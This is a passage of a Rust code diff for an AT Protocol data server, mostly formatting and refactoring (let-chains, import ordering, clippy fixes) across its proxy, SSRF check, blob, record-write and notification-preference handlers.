.into_response(); 136 136 } 137 137 } 138 - } 139 - if let Some(verification_methods) = op.get("verificationMethods").and_then(|v| v.as_object()) { 140 - if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) { 141 - if atproto_key != user_did_key { 138 + if let Some(verification_methods) = op.get("verificationMethods").and_then(|v| v.as_object()) 139 + && let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) 140 + && atproto_key != user_did_key { 142 141 return ( 143 142 StatusCode::BAD_REQUEST, 144 143 Json(json!({ ··· 148 147 ) 149 148 .into_response(); 150 149 } 151 - } 152 - } 153 150 if let Some(also_known_as) = op.get("alsoKnownAs").and_then(|v| v.as_array()) { 154 151 let expected_handle = format!("at://{}", user.handle); 155 152 let first_aka = also_known_as.first().and_then(|v| v.as_str()); ··· 167 164 let plc_client = PlcClient::new(None); 168 165 let operation_clone = input.operation.clone(); 169 166 let did_clone = did.clone(); 170 - let result: Result<(), CircuitBreakerError<PlcError>> = with_circuit_breaker( 171 - &state.circuit_breakers.plc_directory, 172 - || async { plc_client.send_operation(&did_clone, &operation_clone).await }, 173 - ) 174 - .await; 167 + let result: Result<(), CircuitBreakerError<PlcError>> = 168 + with_circuit_breaker(&state.circuit_breakers.plc_directory, || async { 169 + plc_client 170 + .send_operation(&did_clone, &operation_clone) 171 + .await 172 + }) 173 + .await; 175 174 match result { 176 175 Ok(()) => {} 177 176 Err(CircuitBreakerError::CircuitOpen(e)) => {
+1 -1
src/api/mod.rs
··· 15 15 pub mod validation; 16 16 17 17 pub use error::ApiError; 18 - pub use proxy_client::{proxy_client, validate_at_uri, validate_did, validate_limit, AtUriParts}; 18 + pub use proxy_client::{AtUriParts, proxy_client, validate_at_uri, validate_did, validate_limit};
+1 -1
src/api/moderation/mod.rs
··· 35 35 Json(input): Json<CreateReportInput>, 36 36 ) -> Response { 37 37 let token = match crate::auth::extract_bearer_token_from_header( 38 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 38 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 39 39 ) { 40 40 Some(t) => t, 41 41 None => return ApiError::AuthenticationRequired.into_response(),
+2 -2
src/api/notification/register_push.rs
··· 1 - use crate::api::proxy_client::{is_ssrf_safe, proxy_client, validate_did}; 2 1 use crate::api::ApiError; 2 + use crate::api::proxy_client::{is_ssrf_safe, proxy_client, validate_did}; 3 3 use crate::state::AppState; 4 4 use axum::{ 5 + Json, 5 6 extract::State, 6 7 http::{HeaderMap, StatusCode}, 7 8 response::{IntoResponse, Response}, 8 - Json, 9 9 }; 10 10 use serde::Deserialize; 11 11 use serde_json::json;
+36 -38
src/api/notification_prefs.rs
··· 1 + use crate::auth::validate_bearer_token; 2 + use crate::state::AppState; 1 3 use axum::{ 2 4 Json, 3 5 extract::State, ··· 8 10 use serde_json::json; 9 11 use sqlx::Row; 10 12 use tracing::info; 11 - use crate::auth::validate_bearer_token; 12 - use crate::state::AppState; 13 13 14 14 #[derive(Serialize)] 15 15 #[serde(rename_all = "camelCase")] ··· 24 24 pub signal_verified: bool, 25 25 } 26 26 27 - pub async fn get_notification_prefs( 28 - State(state): State<AppState>, 29 - headers: HeaderMap, 30 - ) -> Response { 27 + pub async fn get_notification_prefs(State(state): State<AppState>, headers: HeaderMap) -> Response { 31 28 let token = match crate::auth::extract_bearer_token_from_header( 32 29 headers.get("Authorization").and_then(|h| h.to_str().ok()), 33 30 ) { 34 31 Some(t) => t, 35 - None => { 36 - return ( 37 - StatusCode::UNAUTHORIZED, 38 - Json(json!({"error": "AuthenticationRequired", "message": "Authentication required"})), 39 - ) 40 - .into_response() 41 - } 32 + None => return ( 33 + StatusCode::UNAUTHORIZED, 34 + Json(json!({"error": "AuthenticationRequired", "message": "Authentication required"})), 35 + ) 36 + .into_response(), 42 37 }; 43 38 let user = match validate_bearer_token(&state.db, &token).await { 44 39 Ok(u) => u, ··· 47 42 StatusCode::UNAUTHORIZED, 48 43 Json(json!({"error": "AuthenticationFailed", "message": "Invalid token"})), 49 44 ) 50 - .into_response() 45 + .into_response(); 51 46 } 52 47 }; 53 - let row = match sqlx::query( 54 - r#" 48 + let row = 49 + match sqlx::query( 50 + r#" 55 51 SELECT 56 52 email, 57 53 preferred_notification_channel::text as channel, ··· 63 59 signal_verified 64 60 FROM users 65 61 WHERE did = $1 66 - "# 67 - ) 68 - .bind(&user.did) 69 - .fetch_one(&state.db) 70 - .await 71 - { 72 - Ok(r) => r, 73 - Err(e) => { 74 - return ( 62 + "#, 63 + ) 64 + .bind(&user.did) 65 + .fetch_one(&state.db) 66 + .await 67 + { 68 + Ok(r) => r, 69 + Err(e) => return ( 75 70 StatusCode::INTERNAL_SERVER_ERROR, 76 - Json(json!({"error": "InternalError", "message": format!("Database error: {}", e)})), 71 + Json( 72 + json!({"error": "InternalError", "message": format!("Database error: {}", e)}), 73 + ), 77 74 ) 78 - .into_response() 79 - } 80 - }; 75 + .into_response(), 76 + }; 81 77 let email: String = row.get("email"); 82 78 let channel: String = row.get("channel"); 83 79 let discord_id: Option<String> = row.get("discord_id"); ··· 117 113 headers.get("Authorization").and_then(|h| h.to_str().ok()), 118 114 ) { 119 115 Some(t) => t, 120 - None => { 121 - return ( 122 - StatusCode::UNAUTHORIZED, 123 - Json(json!({"error": "AuthenticationRequired", "message": "Authentication required"})), 124 - ) 125 - .into_response() 126 - } 116 + None => return ( 117 + StatusCode::UNAUTHORIZED, 118 + Json(json!({"error": "AuthenticationRequired", "message": "Authentication required"})), 119 + ) 120 + .into_response(), 127 121 }; 128 122 let user = match validate_bearer_token(&state.db, &token).await { 129 123 Ok(u) => u, ··· 132 126 StatusCode::UNAUTHORIZED, 133 127 Json(json!({"error": "AuthenticationFailed", "message": "Invalid token"})), 134 128 ) 135 - .into_response() 129 + .into_response(); 136 130 } 137 131 }; 138 132 if let Some(ref channel) = input.preferred_channel { ··· 208 202 info!(did = %user.did, "Updated Telegram username"); 209 203 } 210 204 if let Some(ref signal) = input.signal_number { 211 - let signal_clean: Option<&str> = if signal.is_empty() { None } else { Some(signal.as_str()) }; 205 + let signal_clean: Option<&str> = if signal.is_empty() { 206 + None 207 + } else { 208 + Some(signal.as_str()) 209 + }; 212 210 if let Err(e) = sqlx::query( 213 211 r#"UPDATE users SET signal_number = $1, signal_verified = FALSE, updated_at = NOW() WHERE did = $2"# 214 212 )
+15 -22
src/api/proxy.rs
··· 1 + use crate::api::proxy_client::proxy_client; 1 2 use crate::state::AppState; 2 3 use axum::{ 3 4 body::Bytes, ··· 5 6 http::{HeaderMap, Method, StatusCode}, 6 7 response::{IntoResponse, Response}, 7 8 }; 8 - use crate::api::proxy_client::proxy_client; 9 9 use std::collections::HashMap; 10 10 use tracing::error; 11 11 12 12 fn resolve_service_did(did_with_fragment: &str) -> Option<(String, String)> { 13 - if did_with_fragment.starts_with("did:web:") { 14 - let without_prefix = &did_with_fragment[8..]; 13 + if let Some(without_prefix) = did_with_fragment.strip_prefix("did:web:") { 15 14 let host = without_prefix.split('#').next()?; 16 15 let url = format!("https://{}", host); 17 16 let did_without_fragment = format!("did:web:{}", host); 18 17 Some((url, did_without_fragment)) 19 - } else if did_with_fragment.starts_with("did:plc:") { 20 - None 21 18 } else { 22 19 None 23 20 } ··· 41 38 Some(resolved) => resolved, 42 39 None => { 43 40 error!(did = %did_str, "Could not resolve service DID"); 44 - return (StatusCode::BAD_GATEWAY, "Could not resolve service DID").into_response(); 41 + return (StatusCode::BAD_GATEWAY, "Could not resolve service DID") 42 + .into_response(); 45 43 } 46 44 }; 47 45 (url, Some(did_without_fragment)) ··· 50 48 let url = match std::env::var("APPVIEW_URL") { 51 49 Ok(url) => url, 52 50 Err(_) => { 53 - return (StatusCode::BAD_GATEWAY, "No upstream AppView configured").into_response(); 51 + return (StatusCode::BAD_GATEWAY, "No upstream AppView configured") 52 + .into_response(); 54 53 } 55 54 }; 56 55 let aud = std::env::var("APPVIEW_DID").ok(); ··· 60 59 let target_url = format!("{}/xrpc/{}", appview_url, method); 61 60 let client = proxy_client(); 62 61 let mut request_builder = client.request(method_verb, &target_url).query(&params); 63 - let mut auth_header_val = headers.get("Authorization").map(|h| h.clone()); 64 - if let Some(aud) = &service_aud { 65 - if let Some(token) = crate::auth::extract_bearer_token_from_header( 66 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 67 - ) { 68 - if let Ok(auth_user) = crate::auth::validate_bearer_token(&state.db, &token).await { 69 - if let Some(key_bytes) = auth_user.key_bytes { 70 - if let Ok(new_token) = 62 + let mut auth_header_val = headers.get("Authorization").cloned(); 63 + if let Some(aud) = &service_aud 64 + && let Some(token) = crate::auth::extract_bearer_token_from_header( 65 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 66 + ) 67 + && let Ok(auth_user) = crate::auth::validate_bearer_token(&state.db, &token).await 68 + && let Some(key_bytes) = auth_user.key_bytes 69 + && let Ok(new_token) = 71 70 crate::auth::create_service_token(&auth_user.did, aud, &method, &key_bytes) 72 - { 73 - if let Ok(val) = 71 + && let Ok(val) = 74 72 axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token)) 75 73 { 76 74 auth_header_val = Some(val); 77 75 } 78 - } 79 - } 80 - } 81 - } 82 - } 83 76 if let Some(val) = auth_header_val { 84 77 request_builder = request_builder.header("Authorization", val); 85 78 }
+14 -5
src/api/proxy_client.rs
··· 20 20 .pool_idle_timeout(Duration::from_secs(90)) 21 21 .redirect(reqwest::redirect::Policy::none()) 22 22 .build() 23 - .expect("Failed to build HTTP client - this indicates a TLS or system configuration issue") 23 + .expect( 24 + "Failed to build HTTP client - this indicates a TLS or system configuration issue", 25 + ) 24 26 }) 25 27 } 26 28 ··· 48 50 } 49 51 return Ok(()); 50 52 } 51 - let port = parsed.port().unwrap_or(if scheme == "https" { 443 } else { 80 }); 53 + let port = parsed 54 + .port() 55 + .unwrap_or(if scheme == "https" { 443 } else { 80 }); 52 56 let socket_addrs: Vec<SocketAddr> = match (host, port).to_socket_addrs() { 53 57 Ok(addrs) => addrs.collect(), 54 58 Err(_) => return Err(SsrfError::DnsResolutionFailed(host.to_string())), ··· 104 108 SsrfError::InsecureProtocol(p) => write!(f, "Insecure protocol: {}", p), 105 109 SsrfError::NoHost => write!(f, "No host in URL"), 106 110 SsrfError::NonUnicastIp(ip) => write!(f, "Non-unicast IP address: {}", ip), 107 - SsrfError::DnsResolutionFailed(host) => write!(f, "DNS resolution failed for: {}", host), 111 + SsrfError::DnsResolutionFailed(host) => { 112 + write!(f, "DNS resolution failed for: {}", host) 113 + } 108 114 } 109 115 } 110 116 } ··· 158 164 159 165 pub fn validate_limit(limit: Option<u32>, default: u32, max: u32) -> u32 { 160 166 match limit { 161 - Some(l) if l == 0 => default, 167 + Some(0) => default, 162 168 Some(l) if l > max => max, 163 169 Some(l) => l, 164 170 None => default, ··· 190 196 #[test] 191 197 fn test_ssrf_blocks_http_by_default() { 192 198 let result = is_ssrf_safe("http://external.example.com/xrpc/test"); 193 - assert!(matches!(result, Err(SsrfError::InsecureProtocol(_)) | Err(SsrfError::DnsResolutionFailed(_)))); 199 + assert!(matches!( 200 + result, 201 + Err(SsrfError::InsecureProtocol(_)) | Err(SsrfError::DnsResolutionFailed(_)) 202 + )); 194 203 } 195 204 #[test] 196 205 fn test_ssrf_allows_localhost_http() {
+19 -18
src/api/read_after_write.rs
··· 1 + use crate::api::ApiError; 1 2 use crate::api::proxy_client::{ 2 - is_ssrf_safe, proxy_client, MAX_RESPONSE_SIZE, RESPONSE_HEADERS_TO_FORWARD, 3 + MAX_RESPONSE_SIZE, RESPONSE_HEADERS_TO_FORWARD, is_ssrf_safe, proxy_client, 3 4 }; 4 - use crate::api::ApiError; 5 5 use crate::state::AppState; 6 6 use axum::{ 7 + Json, 7 8 http::{HeaderMap, HeaderValue, StatusCode}, 8 9 response::{IntoResponse, Response}, 9 - Json, 10 10 }; 11 11 use bytes::Bytes; 12 12 use chrono::{DateTime, Utc}; ··· 182 182 record, 183 183 }); 184 184 } 185 - } else if data.collection == "app.bsky.feed.like" { 186 - if let Ok(record) = serde_ipld_dagcbor::from_slice::<LikeRecord>(&block_bytes) { 185 + } else if data.collection == "app.bsky.feed.like" 186 + && let Ok(record) = serde_ipld_dagcbor::from_slice::<LikeRecord>(&block_bytes) { 187 187 result.likes.push(RecordDescript { 188 188 uri, 189 189 cid: data.cid_str, ··· 191 191 record, 192 192 }); 193 193 } 194 - } 195 194 } 196 195 Ok(result) 197 196 } ··· 250 249 })?; 251 250 if let Err(e) = is_ssrf_safe(&appview_url) { 252 251 error!("SSRF check failed for appview URL: {}", e); 253 - return Err(ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e)) 254 - .into_response()); 252 + return Err( 253 + ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e)).into_response(), 254 + ); 255 255 } 256 256 let target_url = format!("{}/xrpc/{}", appview_url, method); 257 257 info!(target = %target_url, "Proxying request to appview"); 258 258 let client = proxy_client(); 259 259 let mut request_builder = client.get(&target_url).query(params); 260 260 if let Some(key_bytes) = auth_key_bytes { 261 - let appview_did = std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string()); 261 + let appview_did = 262 + std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string()); 262 263 match crate::auth::create_service_token(auth_did, &appview_did, method, key_bytes) { 263 264 Ok(service_token) => { 264 - request_builder = request_builder.header("Authorization", format!("Bearer {}", service_token)); 265 + request_builder = 266 + request_builder.header("Authorization", format!("Bearer {}", service_token)); 265 267 } 266 268 Err(e) => { 267 269 error!(error = ?e, "Failed to create service token"); ··· 287 289 Some((name, value)) 288 290 }) 289 291 .collect(); 290 - let content_length = resp 291 - .content_length() 292 - .unwrap_or(0); 292 + let content_length = resp.content_length().unwrap_or(0); 293 293 if content_length > MAX_RESPONSE_SIZE { 294 294 error!( 295 295 content_length, ··· 321 321 if e.is_timeout() { 322 322 Err(ApiError::UpstreamTimeout.into_response()) 323 323 } else if e.is_connect() { 324 - Err(ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string()) 325 - .into_response()) 324 + Err( 325 + ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string()) 326 + .into_response(), 327 + ) 326 328 } else { 327 329 Err(ApiError::UpstreamFailure.into_response()) 328 330 } ··· 332 334 333 335 pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response { 334 336 let mut response = (StatusCode::OK, Json(data)).into_response(); 335 - if let Some(lag_ms) = lag { 336 - if let Ok(header_val) = HeaderValue::from_str(&lag_ms.to_string()) { 337 + if let Some(lag_ms) = lag 338 + && let Ok(header_val) = HeaderValue::from_str(&lag_ms.to_string()) { 337 339 response 338 340 .headers_mut() 339 341 .insert(UPSTREAM_LAG_HEADER, header_val); 340 342 } 341 - } 342 343 response 343 344 } 344 345
+27 -22
src/api/repo/blob.rs
··· 30 30 .into_response(); 31 31 } 32 32 let token = match crate::auth::extract_bearer_token_from_header( 33 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 33 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 34 34 ) { 35 35 Some(t) => t, 36 36 None => { ··· 122 122 .into_response(); 123 123 } 124 124 }; 125 - if was_inserted { 126 - if let Err(e) = state.blob_store.put_bytes(&storage_key, bytes::Bytes::from(data)).await { 125 + if was_inserted 126 + && let Err(e) = state 127 + .blob_store 128 + .put_bytes(&storage_key, bytes::Bytes::from(data)) 129 + .await 130 + { 127 131 error!("Failed to upload blob to storage: {:?}", e); 128 132 return ( 129 133 StatusCode::INTERNAL_SERVER_ERROR, ··· 131 135 ) 132 136 .into_response(); 133 137 } 134 - } 135 138 if let Err(e) = tx.commit().await { 136 139 error!("Failed to commit blob transaction: {:?}", e); 137 - if was_inserted { 138 - if let Err(cleanup_err) = state.blob_store.delete(&storage_key).await { 139 - error!("Failed to cleanup orphaned blob {}: {:?}", storage_key, cleanup_err); 140 + if was_inserted 141 + && let Err(cleanup_err) = state.blob_store.delete(&storage_key).await { 142 + error!( 143 + "Failed to cleanup orphaned blob {}: {:?}", 144 + storage_key, cleanup_err 145 + ); 140 146 } 141 - } 142 147 return ( 143 148 StatusCode::INTERNAL_SERVER_ERROR, 144 149 Json(json!({"error": "InternalError"})), ··· 179 184 180 185 fn find_blobs(val: &serde_json::Value, blobs: &mut Vec<String>) { 181 186 if let Some(obj) = val.as_object() { 182 - if let Some(type_val) = obj.get("$type") { 183 - if type_val == "blob" { 184 - if let Some(r) = obj.get("ref") { 185 - if let Some(link) = r.get("$link") { 186 - if let Some(s) = link.as_str() { 187 + if let Some(type_val) = obj.get("$type") 188 + && type_val == "blob" 189 + && let Some(r) = obj.get("ref") 190 + && let Some(link) = r.get("$link") 191 + && let Some(s) = link.as_str() { 187 192 blobs.push(s.to_string()); 188 193 } 189 - } 190 - } 191 - } 192 - } 193 194 for (_, v) in obj { 194 195 find_blobs(v, blobs); 195 196 } ··· 206 207 Query(params): Query<ListMissingBlobsParams>, 207 208 ) -> Response { 208 209 let token = match crate::auth::extract_bearer_token_from_header( 209 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 210 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 210 211 ) { 211 212 Some(t) => t, 212 213 None => { ··· 276 277 let rkey = &row.rkey; 277 278 let record_cid_str = &row.record_cid; 278 279 last_cursor = Some(format!("{}|{}", collection, rkey)); 279 - let record_cid = match Cid::from_str(&record_cid_str) { 280 + let record_cid = match Cid::from_str(record_cid_str) { 280 281 Ok(c) => c, 281 282 Err(_) => continue, 282 283 }; ··· 291 292 let mut blobs = Vec::new(); 292 293 find_blobs(&record_val, &mut blobs); 293 294 for blob_cid_str in blobs { 294 - let exists = sqlx::query!("SELECT 1 as one FROM blobs WHERE cid = $1 AND created_by_user = $2", blob_cid_str, user_id) 295 - .fetch_optional(&state.db) 296 - .await; 295 + let exists = sqlx::query!( 296 + "SELECT 1 as one FROM blobs WHERE cid = $1 AND created_by_user = $2", 297 + blob_cid_str, 298 + user_id 299 + ) 300 + .fetch_optional(&state.db) 301 + .await; 297 302 match exists { 298 303 Ok(None) => { 299 304 missing_blobs.push(RecordBlob {
+2 -2
src/api/repo/import.rs
··· 1 1 use crate::api::ApiError; 2 2 use crate::state::AppState; 3 - use crate::sync::import::{apply_import, parse_car, ImportError}; 3 + use crate::sync::import::{ImportError, apply_import, parse_car}; 4 4 use crate::sync::verify::CarVerifier; 5 5 use axum::{ 6 + Json, 6 7 body::Bytes, 7 8 extract::State, 8 9 http::StatusCode, 9 10 response::{IntoResponse, Response}, 10 - Json, 11 11 }; 12 12 use serde_json::json; 13 13 use tracing::{debug, error, info, warn};
+20 -12
src/api/repo/meta.rs
··· 18 18 Query(input): Query<DescribeRepoInput>, 19 19 ) -> Response { 20 20 let user_row = if input.repo.starts_with("did:") { 21 - sqlx::query!("SELECT id, handle, did FROM users WHERE did = $1", input.repo) 22 - .fetch_optional(&state.db) 23 - .await 24 - .map(|opt| opt.map(|r| (r.id, r.handle, r.did))) 21 + sqlx::query!( 22 + "SELECT id, handle, did FROM users WHERE did = $1", 23 + input.repo 24 + ) 25 + .fetch_optional(&state.db) 26 + .await 27 + .map(|opt| opt.map(|r| (r.id, r.handle, r.did))) 25 28 } else { 26 - sqlx::query!("SELECT id, handle, did FROM users WHERE handle = $1", input.repo) 27 - .fetch_optional(&state.db) 28 - .await 29 - .map(|opt| opt.map(|r| (r.id, r.handle, r.did))) 29 + sqlx::query!( 30 + "SELECT id, handle, did FROM users WHERE handle = $1", 31 + input.repo 32 + ) 33 + .fetch_optional(&state.db) 34 + .await 35 + .map(|opt| opt.map(|r| (r.id, r.handle, r.did))) 30 36 }; 31 37 let (user_id, handle, did) = match user_row { 32 38 Ok(Some((id, handle, did))) => (id, handle, did), ··· 38 44 .into_response(); 39 45 } 40 46 }; 41 - let collections_query = 42 - sqlx::query!("SELECT DISTINCT collection FROM records WHERE repo_id = $1", user_id) 43 - .fetch_all(&state.db) 44 - .await; 47 + let collections_query = sqlx::query!( 48 + "SELECT DISTINCT collection FROM records WHERE repo_id = $1", 49 + user_id 50 + ) 51 + .fetch_all(&state.db) 52 + .await; 45 53 let collections: Vec<String> = match collections_query { 46 54 Ok(rows) => rows.iter().map(|r| r.collection.clone()).collect(), 47 55 Err(_) => Vec::new(),
+3 -1
src/api/repo/mod.rs
··· 6 6 pub use blob::{list_missing_blobs, upload_blob}; 7 7 pub use import::import_repo; 8 8 pub use meta::describe_repo; 9 - pub use record::{apply_writes, create_record, delete_record, get_record, list_records, put_record}; 9 + pub use record::{ 10 + apply_writes, create_record, delete_record, get_record, list_records, put_record, 11 + };
+79 -45
src/api/repo/record/batch.rs
··· 1 1 use super::validation::validate_record; 2 2 use super::write::has_verified_notification_channel; 3 - use crate::api::repo::record::utils::{commit_and_log, RecordOp}; 3 + use crate::api::repo::record::utils::{CommitParams, RecordOp, commit_and_log}; 4 4 use crate::repo::tracking::TrackingBlockStore; 5 5 use crate::state::AppState; 6 6 use axum::{ 7 + Json, 7 8 extract::State, 8 9 http::StatusCode, 9 10 response::{IntoResponse, Response}, 10 - Json, 11 11 }; 12 12 use cid::Cid; 13 - use jacquard::types::{integer::LimitedU32, string::{Nsid, Tid}}; 13 + use jacquard::types::{ 14 + integer::LimitedU32, 15 + string::{Nsid, Tid}, 16 + }; 14 17 use jacquard_repo::{commit::Commit, mst::Mst, storage::BlockStore}; 15 18 use serde::{Deserialize, Serialize}; 16 19 use serde_json::json; ··· 77 80 Json(input): Json<ApplyWritesInput>, 78 81 ) -> Response { 79 82 let token = match crate::auth::extract_bearer_token_from_header( 80 - headers.get("Authorization").and_then(|h| h.to_str().ok()) 83 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 81 84 ) { 82 85 Some(t) => t, 83 86 None => { ··· 154 157 .into_response(); 155 158 } 156 159 }; 157 - let root_cid_str: String = 158 - match sqlx::query_scalar!("SELECT repo_root_cid FROM repos WHERE user_id = $1", user_id) 159 - .fetch_optional(&state.db) 160 - .await 161 - { 162 - Ok(Some(cid_str)) => cid_str, 163 - _ => { 164 - return ( 165 - StatusCode::INTERNAL_SERVER_ERROR, 166 - Json(json!({"error": "InternalError", "message": "Repo root not found"})), 167 - ) 168 - .into_response(); 169 - } 170 - }; 160 + let root_cid_str: String = match sqlx::query_scalar!( 161 + "SELECT repo_root_cid FROM repos WHERE user_id = $1", 162 + user_id 163 + ) 164 + .fetch_optional(&state.db) 165 + .await 166 + { 167 + Ok(Some(cid_str)) => cid_str, 168 + _ => { 169 + return ( 170 + StatusCode::INTERNAL_SERVER_ERROR, 171 + Json(json!({"error": "InternalError", "message": "Repo root not found"})), 172 + ) 173 + .into_response(); 174 + } 175 + }; 171 176 let current_root_cid = match Cid::from_str(&root_cid_str) { 172 177 Ok(c) => c, 173 178 Err(_) => { ··· 178 183 .into_response(); 179 184 } 180 185 }; 181 - if let Some(swap_commit) = &input.swap_commit { 182 - if Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 186 + if let Some(swap_commit) = &input.swap_commit 187 + && Cid::from_str(swap_commit).ok() != Some(current_root_cid) { 183 188 return ( 184 189 StatusCode::CONFLICT, 185 190 Json(json!({"error": "InvalidSwap", "message": "Repo has been modified"})), 186 191 ) 187 192 .into_response(); 188 193 } 189 - } 190 194 let tracking_store = TrackingBlockStore::new(state.block_store.clone()); 191 195 let commit_bytes = match tracking_store.get(&current_root_cid).await { 192 196 Ok(Some(b)) => b, ··· 195 199 StatusCode::INTERNAL_SERVER_ERROR, 196 200 Json(json!({"error": "InternalError", "message": "Commit block not found"})), 197 201 ) 198 - .into_response() 202 + .into_response(); 199 203 } 200 204 }; 201 205 let commit = match Commit::from_cbor(&commit_bytes) { ··· 205 209 StatusCode::INTERNAL_SERVER_ERROR, 206 210 Json(json!({"error": "InternalError", "message": "Failed to parse commit"})), 207 211 ) 208 - .into_response() 212 + .into_response(); 209 213 } 210 214 }; 211 215 let original_mst = Mst::load(Arc::new(tracking_store.clone()), commit.data, None); ··· 220 224 rkey, 221 225 value, 222 226 } => { 223 - if input.validate.unwrap_or(true) { 224 - if let Err(err_response) = validate_record(value, collection) { 225 - return err_response; 227 + if input.validate.unwrap_or(true) 228 + && let Err(err_response) = validate_record(value, collection) { 229 + return *err_response; 226 230 } 227 - } 228 231 let rkey = rkey 229 232 .clone() 230 233 .unwrap_or_else(|| Tid::now(LimitedU32::MIN).to_string()); ··· 234 237 } 235 238 let record_cid = match tracking_store.put(&record_bytes).await { 236 239 Ok(c) => c, 237 - Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to store record"}))).into_response(), 240 + Err(_) => return ( 241 + StatusCode::INTERNAL_SERVER_ERROR, 242 + Json( 243 + json!({"error": "InternalError", "message": "Failed to store record"}), 244 + ), 245 + ) 246 + .into_response(), 238 247 }; 239 248 let collection_nsid = match collection.parse::<Nsid>() { 240 249 Ok(n) => n, ··· 244 253 modified_keys.push(key.clone()); 245 254 mst = match mst.add(&key, record_cid).await { 246 255 Ok(m) => m, 247 - Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to add to MST"}))).into_response(), 256 + Err(_) => return ( 257 + StatusCode::INTERNAL_SERVER_ERROR, 258 + Json(json!({"error": "InternalError", "message": "Failed to add to MST"})), 259 + ) 260 + .into_response(), 248 261 }; 249 262 let uri = format!("at://{}/{}/{}", did, collection, rkey); 250 263 results.push(WriteResult::CreateResult { ··· 262 275 rkey, 263 276 value, 264 277 } => { 265 - if input.validate.unwrap_or(true) { 266 - if let Err(err_response) = validate_record(value, collection) { 267 - return err_response; 278 + if input.validate.unwrap_or(true) 279 + && let Err(err_response) = validate_record(value, collection) { 280 + return *err_response; 268 281 } 269 - } 270 282 let mut record_bytes = Vec::new(); 271 283 if serde_ipld_dagcbor::to_writer(&mut record_bytes, value).is_err() { 272 284 return (StatusCode::BAD_REQUEST, Json(json!({"error": "InvalidRecord", "message": "Failed to serialize record"}))).into_response(); 273 285 } 274 286 let record_cid = match tracking_store.put(&record_bytes).await { 275 287 Ok(c) => c, 276 - Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to store record"}))).into_response(), 288 + Err(_) => return ( 289 + StatusCode::INTERNAL_SERVER_ERROR, 290 + Json( 291 + json!({"error": "InternalError", "message": "Failed to store record"}), 292 + ), 293 + ) 294 + .into_response(), 277 295 }; 278 296 let collection_nsid = match collection.parse::<Nsid>() { 279 297 Ok(n) => n, ··· 284 302 let prev_record_cid = mst.get(&key).await.ok().flatten(); 285 303 mst = match mst.update(&key, record_cid).await { 286 304 Ok(m) => m, 287 - Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to update MST"}))).into_response(), 305 + Err(_) => return ( 306 + StatusCode::INTERNAL_SERVER_ERROR, 307 + Json(json!({"error": "InternalError", "message": "Failed to update MST"})), 308 + ) 309 + .into_response(), 288 310 }; 289 311 let uri = format!("at://{}/{}/{}", did, collection, rkey); 290 312 results.push(WriteResult::UpdateResult { ··· 321 343 } 322 344 let new_mst_root = match mst.persist().await { 323 345 Ok(c) => c, 324 - Err(_) => return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to persist MST"}))).into_response(), 346 + Err(_) => { 347 + return ( 348 + StatusCode::INTERNAL_SERVER_ERROR, 349 + Json(json!({"error": "InternalError", "message": "Failed to persist MST"})), 350 + ) 351 + .into_response(); 352 + } 325 353 }; 326 354 let mut relevant_blocks = std::collections::BTreeMap::new(); 327 355 for key in &modified_keys { 328 - if let Err(_) = mst.blocks_for_path(key, &mut relevant_blocks).await { 356 + if mst.blocks_for_path(key, &mut relevant_blocks).await.is_err() { 329 357 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 330 358 } 331 - if let Err(_) = original_mst.blocks_for_path(key, &mut relevant_blocks).await { 359 + if original_mst 360 + .blocks_for_path(key, &mut relevant_blocks) 361 + .await 362 + .is_err() 363 + { 332 364 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 333 365 } 334 366 } ··· 344 376 .collect::<Vec<_>>(); 345 377 let commit_res = match commit_and_log( 346 378 &state, 347 - &did, 348 - user_id, 349 - Some(current_root_cid), 350 - Some(commit.data), 351 - new_mst_root, 352 - ops, 353 - &written_cids_str, 379 + CommitParams { 380 + did: &did, 381 + user_id, 382 + current_root_cid: Some(current_root_cid), 383 + prev_data_cid: Some(commit.data), 384 + new_mst_root, 385 + ops, 386 + blocks_cids: &written_cids_str, 387 + }, 354 388 ) 355 389 .await 356 390 {
+61 -20
src/api/repo/record/delete.rs
